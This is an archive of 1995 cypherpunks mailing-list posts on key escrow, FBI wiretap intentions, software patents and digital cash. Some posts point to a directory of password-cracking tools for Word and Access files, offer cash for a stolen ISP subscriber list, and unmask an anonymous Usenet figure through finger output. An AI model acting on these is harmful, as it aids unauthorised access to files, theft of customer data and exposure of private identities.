From: Adam Shostack <adam@homeport.org>
Date: Fri, 6 Oct 95 18:14:56 PDT
To: bplib@wat.hookup.net (Tim Philp)
Subject: Re: Microsoft encryption
In-Reply-To: <Pine.OSF.3.91.951006174218.7617A-100000@nic.wat.hookup.net>
Message-ID: <199510070118.VAA05315@homeport.org>
MIME-Version: 1.0
Content-Type: text


| Does anyone have any information about the methods used to password 
| protect Word documents and Access files? Is there a general way to 
| decode these files?

There is a collection of cracking tools on
utopia.hacktic.nl:/pub/replay/cracking





-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Price <billcdi@deltanet.com>
Date: Fri, 6 Oct 95 23:46:10 PDT
Subject: GET EVEN: Realm Internet Systems
Message-ID: <45480r$8oo@news2.deltanet.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello to All,

I was recently ripped-off by Realm Internet Systems (realm.net) of Newport Beach, 
CA. They offer extremely poor service and are quite unprofessional.

They have lied to me at every opportunity and I would enjoy teaching them a small 
lesson in etiquette. Brief history: I signed up on March 28th, 1995. Their 
documentation revealed that I 'May or may not' be billed for the entire month if 
service was established close to the end of the month.

I phoned and inquired as to what criteria was used to determine the billing period. I 
was assured that I would not be charged for the remaining two days - They lied!

They billed me for three months use and a set-up fee. One months billing was a 'last 
month's' fee. They ignored most all requests for assistance or information and their 
system malfunctioned often.

I informed them of my planed three months travel to Russia and inquired about 
having my mail forwarded. They said no and suggested me to Telnet for retrieval. I 
asked about a reduced semi-active account rate and they reluctantly agreed to 
revert my account to a shell account for $15 per month (PPP was $35).

They did not do this and continually charged me $35 in my absence. As I had 
allocated only sufficient funds on my charge card for the $15 charges, the available 
balance was soon exceeded and Realm Internet Systems cancelled my service.

I begged them to reinstate for one month until I returned (they had credit owed me 
for overbilling and last month's fee) - they refused! When I returned from Moscow, I 
mailed them a check immediately for two months usage (one week for charging 
charge card as payment would not post immediately).

They reinstated my account for one month. Their system was unoperational for two 
weeks and they refused to acknowledge the problem. After many frustrating hours 
trying to diagnose my system, I finally reached a technician who admitted they had 
a problem.

The problem was never fixed and the receptionist was having a wonderful time 
taunting me and placing me on hold after each five words or so that I could say. I 
finally threatened to physically visit their office and resolve the problem. 

The owner came to the phone and would not reveal his name. He laughed at me at 
suggested that I @$*& Off. They refuse to refund the $115 owed to me. 

I signed up with Delta Internet Services in Anaheim,CA. They are a first rate 
company. Too bad I did not know of them before. Well, the point of all of this 
(thanks for you patience) is that I want to let other subscribers of Realm know they 
are not alone.

If anyone in your group could somehow obtain a list of <realm.net> subscribers, I 
would like to mail each of them a description of my problem and suggest they 
consider Delta Internet Services.

I will pay a modest $50 cash for this information. You may provide me anonymously. 
<billcdi@deltanet.com>.

Thanks,
Bill Price






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Fri, 6 Oct 95 14:22:47 PDT
To: cypherpunks@toad.com
Subject: CancelMoose = William Nagengast?
Message-ID: <199510062121.WAA28108@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I did a little digging around, and came up with the following identity
for the cancelmoose:

> finger moose@panix.com
[panix.com]
Login Name: moose                       Full Name: William Nagengast 
Directory: /net/u/11/m/moose            Shell: /usr/local/bin/psh
Last login Wed Nov  9 17:21:18 on panix.com ttyq2 from ts3.nyc.access.n.
No mail information available.

Is this publicly known information?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Sat, 7 Oct 95 01:51:53 PDT
To: cypherpunks@toad.com
Subject: secure split; secure device
Message-ID: <199510071224.HAA00025@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Cypherpunks,
   I am looking for Secure Split and for the latest version of secure device.
I've got secure device 1.3. Is that the latest.  Yours Truly, Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sat, 7 Oct 95 05:36:37 PDT
To: cypherpunks@toad.com
Subject: FBI intentions [Re: Where is text of wiretap bill]
In-Reply-To: <951006.165006.5n9.rnr.w165w@cybrspc.mn.org>
Message-ID: <199510071236.FAA05136@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> In list.cypherpunks, jim@acm.org writes:

>> An assistant director of the FBI, William Baugh, spoke recently at the ICI
>> conference in DC.  He said he hoped American industry would be cooperative
>> in making the voluntary compliance with TESSERA or other GAK widespread,
>> because if it doesn't happen then they would need to come back and get
>> more Congressional action, and "we found the coercive solution we had to
>> use for Digital Telephony very draining."

> roy@cybrspc.mn.org (Roy M. Silvernail) writes:

> I shouldn't be surprised to see this, but it does strike me as pretty
> blatant.  Aren't the Fibbies supposed to be putting a less threatening
> spin on this stuff?  Or are the gloves coming off?

The latter, assuming the gloves were ever on.  In the previous day's
presentations at the ICI conference, FBI Dir. Freeh spoke about the need
for the FBI to get not only decryptable wiretaps but also decryptable
files, and pointed out that some of the proposals about limited-duration
keys would not let them decrypt files they seized with a legal warrant if
those files had been encrypted earlier than the warrant date.  He took Q&A
for a while, and I got to ask the first Q:

Q: Does the Bureau favor making escrowed keys mandatory for domestic
   encryption?
A: Not at this time.  We hope that voluntary compliance and cooperation
   from industry will result in companies developing a single system for
   export and for domestic use.  If this does not happen, then we will
   need to take further action.

	Jim Gillogly
	16 Winterfilth S.R. 1995, 12:33




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 7 Oct 95 03:53:08 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <3075BB6D.3A91@netscape.com>
Message-ID: <199510071052.GAA22544@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



>   And how do you define a "known secure server"?
> 
> 	--Jeff


YOu would have to ask Open Market, Inc. I am
just reporting the news..

/hawk

> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Sat, 7 Oct 95 03:55:56 PDT
To: sameer@c2.org (sameer)
Subject: Re: Open Market, Inc. Announcing security products
In-Reply-To: <199510062337.QAA17601@infinity.c2.org>
Message-ID: <199510071054.GAA22560@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Yes.. they mean that if you have a version of any commerical server
and someone finds a hole.. they will make one of theirs available.

/hawk
> 
> 	I think they mean "our server" by "known secure server."
> 
> 	I'm getting quite sick of people who think their system is
> secure just because it hasn't been broken.
> 
> 
> > 
> > Harry S. Hawk wrote:
> > > 3) Offer a free upgrade problem for people who have a server that has
> > >    had a security breach. They can download a known secure server.
> > 
> >   And how do you define a "known secure server"?
> > 
> > 	--Jeff
> > 
> > -- 
> > Jeff Weinstein - Electronic Munitions Specialist
> > Netscape Communication Corporation
> > jsw@netscape.com - http://home.netscape.com/people/jsw
> > Any opinions expressed above are mine.
> > 
> 
> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:	 510-601-9734
> An Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org (or login as "guest")			sameer@c2.org
> 


-- 
                Harry Hawk
                Manager of Computer Services
                Warwick Baker & Fiore
                212 941 4438
                habs@warwick.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 06:19:50 PDT
To: cypherpunks@toad.com
Subject: UNA_fim
Message-ID: <199510071319.JAA09731@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-95. NYPaper:


   "Got Killer Chips on Our Minds." (Film review)

      Why are computers so often portrayed as turning truth
      into lies and making our brains go haywire? Are we
      frightened? Do audiences love their computers? Probably
      not, movies say. Hal's evil-spirited descendants are all
      around us, threatening to take over intelligence,
      emotions, Social Security numbers and every other little
      thing that makes us civilized. All this tends to put a
      damper on the idea that we are a nation eager to embrace
      a wonderful new technology. While it makes sense that
      film makers would pounce on a flourishing, quickly
      growing, subject like computers, it doesn't necessarily
      follow that all those computers would be so destructive.
      But there are no movies right now in which a nice
      friendly computer wears tennis shoes and does something
      heroic. Instead, films are suggesting that we are a
      nation of secret technophobes, distrustful of a
      technology hurtling toward us faster than we can cry
      "Stop!" or run to the store for another self-deprecating
      book like "Windows '95 for Dummies" or "The Complete
      Idiot's Guide to Windows '95" (both actual titles).


   UNA_fim  (9 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T. Bruce Tober" <Octobersdad@crecon.demon.co.uk>
Date: Sat, 7 Oct 95 12:09:33 PDT
Subject: European Crypto
Message-ID: <877045118wnr@crecon.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with names and contact information for any of the Council of Europe 
representatives who deliberated and/or voted on the recent recommendations 
on crypto, e-mail me that information. Likewise any information on 
any further actions by the EU in this regard. Working on an article for 
a computer magazine.

tbt




-- 

|Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng|
|  Publisher/Editor of The Write Byte monthly newsletter  |
|            WebSite address to come shortly              |
| TWB - The computer newsletter specifically for Writers  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "T. Bruce Tober" <Octobersdad@crecon.demon.co.uk>
Date: Mon, 9 Oct 95 12:58:25 PDT
To: Cypherpunks Lite <cp-lite@comsec.com>
Subject: European Crypto
Message-ID: <199510091831.LAA09772@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


Anyone with names and contact information for any of the Council of Europe 
representatives who deliberated and/or voted on the recent recommendations 
on crypto, e-mail me that information. Likewise any information on 
any further actions by the EU in this regard. Working on an article for 
a computer magazine.

tbt




-- 

|Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng|
|  Publisher/Editor of The Write Byte monthly newsletter  |
|            WebSite address to come shortly              |
| TWB - The computer newsletter specifically for Writers  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mkj@october.ducktown.org
Date: Sat, 7 Oct 95 07:44:57 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
Message-ID: <199510071424.AA00279@october.ducktown.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Forwarded message:
> >James A. Donald wrote:
> > Crazy no.  Their objective is to create a surveillance state, where 
> > all actions are known and recorded by the state, in order to 
> > facilitate detailed state control over every aspect of our lives.  Our 
> > agenda is the opposite.  There is no commonality of purpose, hence no 
> > possibility of cooperation.   
> 
>And Perry Metzger replied:
> I disagree. Most NSA types are probably stock government employees who
> want to get their job done with the least muss and fuss. Some of them
> actually have pride in their work. Very few of them are likely
> actively evil.

Need I point out that pride in one's work is not necessarily exclusive
of evil?  Rarely does anyone actually think of themselves as evil --
and those few who do are usually just harmless nuts.  The most evil
and destructive people throughout history have always thought of
themselves as good people, doing good work.  As the saying goes, the
most effective con men are those who believe their own cons.

Is there anyone here who seriously doubts that if the international
intelligence community successfully implements any significant part of
their openly-expressed agenda, it will constitute the most gigantic
threat to human freedom that mankind has ever faced?  If that isn't
evil, I don't know what is.

By the way, I don't necessarily agree that the main objective of the
surveillance state is to facilitate detailed control of our lives.  I
think the objective of the international intelligence community, like
virtually every political organization, is simply to accumulate more
money and power to themselves.  Unfortunately, their method of doing
this is particularly destructive and dangerous to human rights.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHaNRF11Wd4tm8clAQHNfgP/Y4N5JNpr0IwZY2UQFDjw5ootMUdwXLFq
oW9MirShBBNn6xLyJBNBG7Po8hd3cUrmzqC6qWMiyWAROXPOTjUfJYiI2ziPIX4P
xL3hos2+EwSWuveEKndh6kRgQ8MeknOfhnpJxKosbvZ1nLxYXUI+CmnNNTnN042y
o/uQlHpoHtU=
=UMP0
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 7 Oct 95 08:15:46 PDT
To: cypherpunks@toad.com
Subject: Re: FBI intentions
Message-ID: <199510071510.LAA83825@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<snip>

Jim Gillogly asked FBI Dir. Freeh:

>Q: Does the Bureau favor making escrowed keys mandatory for domestic
>   encryption?

And FBI Dir. Freeh replied:

>A: Not at this time.  We hope that voluntary compliance and cooperation
>   from industry will result in companies developing a single system for
>   export and for domestic use.  If this does not happen, then we will
>   need to take further action.

Translation: "Not 'till after the election, Jim."
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMHaYN21lp8bpvW01AQGJNgP9GeFHaT6+BF0XQCqPUSAygcIL2CAsg6hw
vcb+h9CRjdMZYCrbryL8CGU7A6ZLNXhUuG9RDytfCsD/l41p2jNtV9XztTgHFWXf
R4RmJu6miXpja/30s/TyuvFlJIl5lKxrHmkYvTK4T9xS+G80hu/1btL+XfViSZG6
wkUguTzH1QE=
=dxMb
-----END PGP SIGNATURE-----
Regards, Jim Ray

 "Every act of visibility is an act of resistance." Suzanne Pharr
-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
-----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Grubs (W8GRT)" <jgrubs@webcasters.com>
Date: Sat, 7 Oct 95 09:42:13 PDT
To: "cypherpunks@toad.com>
Subject: Kerserver keyrings
Message-ID: <199510071639.MAA29272@norden1.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: Jim Grubs (W8GRT) * EMC.Ver #2.5.02 ] --
 Attachment: mailsig Code: 0006727      \ Created: 10-03-95, 07:16 PM [1 Kb]

Someone at Uni-Hamburg must have seen my message and said, "Oops, who turned
that off?" Anyway, their keyring was upated today. It's 6.4 megs!!!! (My
first HD was only 10.)



begin 644 mailsig
M+2T-"B`@("`@("`@("`@("`@("`@("`@("`@(%=E8D-A<W1E<G,H=&TI#0I*
M86UE<R!#+B!'<G5B<R`@("`@("`@("`@("`@("`@("`@("`@("`@("`@:F=R
M=6)S0'=E8F-A<W1E<G,N8V]M#0HV.#$W($UA<&QE=V]O9"!!=F5N=64@("`@
M("`@("`@("`@("`@("`@("`@("`@5&5L+CH@-#$Y+3@X,BTR-CDW#0I3>6QV
M86YI82P@3V@@-#,U-C`@("`@("`@("`@("`@("`@("`@("`@("`@("`@($9A
M>#H@-#$Y+3@X-2TR.#$T#0H@($EN=&5R;F5T(&-O;G-U;'1I;F<L($A434P@
E<')O9W)A;6UI;F<L($EN9F]R;6%T:6]N(&)R;VME<FEN9PT*(```
 
end






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 7 Oct 95 12:56:08 PDT
To: cypherpunks@toad.com
Subject: Software Patents are Freezing Evolution of Products
Message-ID: <ac9c0ed8360210042ca0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



INTRODUCTION

I'm finally going to write down some of my evolving views on why software
patents are fraught with dangers. Yes, many of you are no doubt already
convinced that software patents (XOR cursor, RSA, digicash, etc.) are a Bad
Idea, but I have a different angle on this which I'd like to present.

SUMMARY

Thesis: Software patents are a bad idea because they freeze the evolution
too early and payment metering schemes are too difficult to arrange, which
also helps to freeze evolution. Software patents are bad because customers
cannot freely and without entanglements incorporate the ideas into their
own products. The situation has become much worse with software, because
there is no physical object which can be used to meter usage of a patent.


HOW PATENTS WORK WITH PHYSICAL OBJECTS

Before explaining this thesis, let's look at how patents work with
_physical_ inventions, even if those inventions embody abstract process or
software inventions.

The microprocessor is a good example, which I'll use here for most of my
examples. (Note that Intel did not try to patent the "basic idea" of the
microprocessor; Gilbert Hyatt claims he filed before Intel produced the
first 4004, but this claim and the swirl of issues around the Patent
Office's granting of a patent to him are a separate topic.)

A microprocessor chip incorporates numerous items that are patented,
copyrighted, or that have trade secret status. Some of these patents, etc.,
even involve design tools used to design the chip. And some of the patents
involve sophisticated production methods. And yet a customer can simply
*buy* the chips and use them as he *wishes*, in hamburger cookers or in
digital money schemes, without any further regard for the patents. No
entanglements.

You go down to Fry's Electronics, buy some Pentiums or PPCs and use them as
you wish. No permissions needed from Intel or Motorola, no complex license
agreements saying you won't use the chips to compete with Intel's board
business or with Motorola's cellular phone business, no restrictions (save
for government laws about munitions, etc.) on who you can resell the chips
or systems to.

That is, the whole set of patent and copyright issues is _encapsulated_ or
_reified_ into the instance being sold. The physical object carries the
embodiment of the patents (including the process patents used to fabricate
the chip: the user of such a chip can be oblivious to these patents and
need not worry that a design will infringe on these patents).

[Sidenote: The astute observer will note some conceptual similarities to
"on-line clearing," to a "cash-and-carry" business. Once you've paid your
money and taken delivery of your 486 or your laser or your widget, how you
incorporate it into future products is generally your business and yours
alone. I say "generally," and legal beagles will point out that some
hardware sales may have restrictions placed on what can be done with the
hardware. Contracts are always possible. But for most objects, there is no
such additional contract. The widget seller has made his money by the sale
of his widget and cannot really try too hard to make more "downstream"
money, except by modifying his future prices to reflect what he perceives
demand to be.]


SOFTWARE IS REPLICABLE

Hardware object cannot be easily replicated, and hence patents can be
reified into the objects. Software objects of course _can_ be easily
replicated, which is why convoluted licensing and complex payment contracts
are involved.

(This is an incredibly important distinction, and one which also relates
closely to why "software ICs" and "object widgets" are not built, sold,
improved upon, etc. by the software industry. Ted Kaehler of Apple once
told me that an H-P analyst/thinker came up with this sort of analysis of
why there is no "software IC" industry to parallel the actual IC industry.
He argues that there is no "learning curve" for software, in the way there
is for physical objects. Sorry, I don't recall his name. If I were pursuing
this essay here as an actual, researched paper, I would did up this guy's
analysis. Also, Brad Cox has done a lot of work on "software ICs"--he
coined the term, in fact--and his papers are worth looking at.)


HOW THIS APPLIES TO THE CRYPTO COMMUNITY

Contrast this with the following "software patent" situations, the ones
directly relating to our crypto community:

1. The public key and RSA patents. RSADSI (and I'm ignoring for now the
implications of the PKP/Cylink complication) wants to see intended
applications and to work out arrangements for license payment based on
profits, volume, effects on their other licensees, etc. This limits the
ways in which the RSADSI patents have been incorporated into evolutionary
and revolutionary products.

2. The Chaum Digicash patents. Digicash wants $150K upfront, plus 10% of
profits. (Cf. Adam Back's posting on this today.) Digicash has their own
particular version they are pushing, but others are effectively shut out of
developing experimental applications. Imagine the situation if the garage
shop developers of personal computers had been forced to pay Intel up front
for the right to design in an 8008 or 8080 microprocessor, and then promise
to pay 10% of their profits to Intel (and 5% to the power supply vendor, 8%
to the keyboard supplier, 4% to the capacitor makers, 9% to the memory chip
companies, and so on....).

In both of these cases, the confusing, complicating, and almost
insurmountable issue is that these conditions are very hard to meet. It's
not just the issue of sharing a business plan with RSADSI or Digicash, it's
the fact that many aspects of one's business are unknown: the viability,
the volume, the future products, etc. The "garage shop" folks usually can't
even get in the door to talk to these companies.


THE REAL ISSUE: TRANSACTION COSTS ARE THWARTING EVOLUTONARY DEVELOPMENT

To me, the issue of concern is not that "software ideas should not be
patented." After all, why should the _idea_ of a safety pin or a windshield
wiper be any more patentable than the idea for a blinded transaction?

Rather, the issue of concern is that the patents on the software ideas and
concepts mean that experimenters, developers, and hackers cannot buy a
license for digicash the way they would buy some ICs and then experiment,
develop, and hack. Another way of looking at this is that _transaction
costs_ are too high and are thwarting normal evolutionary development. The
guy in the garage trying to develop a "digital postage stamp," for example,
can't use the Chaumian blinding protocols without hiring lawyers, paying
Chaum his up-front fee, and laying out his designs and business plans
(which he very probably doesn't even have!).

(Clarification: I'm not saying one can't buy fairly cheap RSA versions,
such as the code in RSAREF. What I'm saying is that one can't get a "core
module" for digicash, for example, and then test out the market with
various implementations, going into volume production with the ones that
are most successful.)

(And you can perhaps tell from my views here that I am not villifying
either RSADSI or Digicash here for their policies: they are trying to make
a reasonable profit in the face of a situation very much unlike the
situation faced for physical objects like microprocessors. David Chaum
points out that "there is no digital coin." Likewise, there is no "software
coin," and so the developers of novel ideas cannot "reify" the ideas in
things they can sell...rather, we see the current approach of convoluted
and restrictive licensing contracts. They try to make up for the lack of a
"software coin" by grilling potential customers about their expected
markets and by setting up complicated contracts to ensure--they
think--enough profits.)


EVOLUTION

What do I mean my "freezing" the evolution of products? Take the case of
Digicash and their test release.

As I pointed out in a recent essay ("Crypto + Economics + AI = Digital
Money Economies"), we are _impoverished_ with regard to the basic building
blocks we have for a digital money system. Where are the equivalents of
what we find necessary in the existing financial world?

Does anybody think that a particular instance of digital cash is the end
state of the evolution of digital cash? It is likely just the beginning.

But by the licensing of particular systems, and by having convoluted and
restrictive arrangements for use of the patents, the evolution of digital
money and crypto systems grinds to a halt. Instead of having dozens of
implementations of digital cash systems (I mean real digital cash systems,
embodying the Chaumian or Brandsian blinding schemes, not the cheesy
"smartcard" systems that are carelessly called "digital cash), we have only
a very few: a road toll system here, a play money experiment there, etc.

Evolution works by _differential reproduction_ (often misleadingly called
"survival of the fittest"). Several dozen variants of personal computers
are introduced (Sphere, Altair, Imsai, Sol, Exidy, Pet, Apple I, Apple II,
IBM PC, Macintosh, etc.), and customers reward the ones they like with
increased sales, causing the "genes" (or memes) of the winning products and
companies and designers to propagate.

The ability to incorporate PGP into tools and objects without complicated
entanglements is one reason PGP did so well. It was a "building block" that
anybody could build into other tools and objects, without regard for how
big the market might be for their tools, without regard to what other users
were doing, etc. (I'm ignoring for the moment any claims RSADSI may have
had that PGP infringed.)


CONCLUSIONS

Both the public key and digital cash situations are being affected by this
inability of people to use the core ideas as building blocks for more
complicated--or more revolutionary--systems. It's as if Intel had, in 1971,
insisted that all designs be approved by them, and that chips could not be
sold to competitors who had already licensed the chips, and that 10% of all
profits be ceded to Intel. This would likely have had a big effect on the
explosion of applications that came about in the years since the micro's
introduction.

Do I have a solution for RSADSI, Cylink, Digicash, and others? Given that
there is no "software coin," my hunch is that no simple solution exists.

To take David Chaum's case in particular, I think he'll end up making a lot
more money by being the guru and consultant on digital money systems (the
inventor of a field and all) than by having licensing schemes which are
probably unenforceable and which are mostly slowing down the evolution of
the bits and pieces needed for true digital money economies.

I've had these ideas swirling in my head for a long time, and thought it
was time to share them with you folks.

Comments are welcome.


--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 7 Oct 95 10:37:00 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Supercomputer export ease
In-Reply-To: <9510061437.AA18425@sulphur.osf.org>
Message-ID: <Pine.SUN.3.91.951007133250.4328B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


The policy always made nearly as much sense as the crypto export 
restriction. My favourite r.a.a. was one I heard about when I was working 
as a unix admin at the Technion. The rules forbid exporting a four 
processor convex , but had no problems with two two processor models. 

Simon

Contract with America - Explained!			|Phone: +44-81-500-3000
Contract: verb						|Mail: ses@unc.edu
1) To shrink or reduce in size - the economy contracted +-----------------------
2) To become infected -My baby contracted pneumonia when they stopped my welfare





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 7 Oct 95 10:48:21 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510060440.VAA23299@jobe.shell.portal.com>
Message-ID: <199510071748.NAA09738@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> Bob Smart <smart@mel.dit.csiro.au> writes:
> >Consider the IPSEC case. The current situation is:
> 
> >1. We go through some process, let's call it Process A, where we determine
> >   that we want to talk to IP address 192.9.8.7.
> 
> This would be, say, a DNS lookup on www.egghead.com.

Just thought I'd point out that IPSEC isn't in general going to use
host keys. Its designed to be more general, and I hope that it ends up
being used much more like Kerberos -- i.e. well known service keys and
user keys.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Sat, 7 Oct 95 14:39:25 PDT
To: Raph Levien <raph@CS.Berkeley.EDU>
Subject: Re: Revised CJR
In-Reply-To: <199510070003.RAA12771@kiwi.cs.berkeley.edu>
Message-ID: <Pine.ULT.3.91.951007163815.16906B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 6 Oct 1995, Raph Levien wrote:

> SPECIAL CHARACTERISTICS
> 
> There are no military standards or specifications that this t-shirt is
> designed to meet. There are no special characteristics of the t-shirt,
> including no radiation-hardening, no ballistic protection, no hard
            ^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^
> points (the t-shirt is only available in soft 100% cotton), no TEMPEST
  ^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> capability, no thermal and no infrared signature reduction capability
> (in excess of that provided by a typical black cotton t-shirt), no
> surveillance, and no intelligence gathering capability. The t-shirt
> does not use image intensification tubes.

Oh I love it.  I warm kudo for whoever game up with the above wording (as 
well as the rest of the paragraph). :-)


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMHbXnDokqlyVGmCFAQGaNwQAxqLhHyWK/lRgcBSc9NfJGddOOmLAo0ky
YTIVhsPttadIUUR9pnCZAx6j5dIsPtastkQBF8kMFikI32emUSEXOEws4Irn3cQe
Og3fyRoN6fGIZUrDTHtn8uz//m9MRnLbl0lbYRhrBeToQoZhkTKb+YpZqLf3G1SF
w/ddiKG/Z6s=
=Yxye
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 7 Oct 95 15:08:13 PDT
To: cypherpunks@toad.com
Subject: HOW_ler
Message-ID: <199510072208.SAA25389@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist of Oct 7-13 grins at Net banks and smirks at
   their telecomms bedding wetting betting, titters at the
   "French hacker's" 120-comp hoist of Netscape and the
   Russky's heist of Citibank, and knee-slaps at the
   "slanging" match of hateful yoked-oxen Visa and MasterCard
   dragging long ropes of intertwined shit.


   HOW_ler












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sat, 7 Oct 95 10:27:54 PDT
To: ecm@ai.mit.edu
Subject: cypherpunks digicash bank?
Message-ID: <15811.9510071727@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Re the attempts to get a practical DigiCash system moving with the
unofficial exchanges at the two exchanges:

	http://www.c2.org/~mark/ecash/ecash.html
	http://www.firecloud.com/eshop/eshop.htm

plus people participating on the ecm mailing list

	http://www.ai.mit.edu/people/lethin/ecm/

one of the major problems which crops up in discussion is that there
is no guaranteed future for the current issue of Digicash, ie it
relies on the digicash trial, and DigiCash's continuation in running
this server.

...

One solution would be for some one, a group of cypherpunks, or
individual cypherpunk, a startup company, to actually license the
technology from Chaum.  It has always puzzled me as to why Chaum
hadn't taken this approach himself.

- From what I've read in previous discussions, the price is $150k, plus
10% of profits.  Other than that what is required is presumably a
dealership in the major credit cards (VISA/mastercard, etc), a secure
WWW server (to allow on-line purchase of c$), or simply PGP signed,
encrypted emailed purchase instructions, and a good internet
connection.  Also some legal consultations to check if setting up such
a system - payee anonymous, would be ok in the US.  Or perhaps another
jurisdiction if this was a sticking point.  Work out anonymous
gateways to things like MSN electronic cheques later :-)

It strikes me that none of these things are insurmountable, and that
the resulting system could become very popular, as well as furthering
the cypherpunks cause - in the sense of having good cryptographic
system in place, which would hopefully attain wide use.

All that would be needed would be the internet connect (which some
folks have already?), VISA/mastercard (same folks might have already?)
$200k ($50k to honour existing digicash currency, at 5c$ to 100 US$ +
$150k for license), a well secured host, and lots of work.  Start
small, that's my moto, no need to go investing more than that until
the things started, and bringing money.  As, and if, it brings in
money, use that to buy better net connect, server hardware, etc.

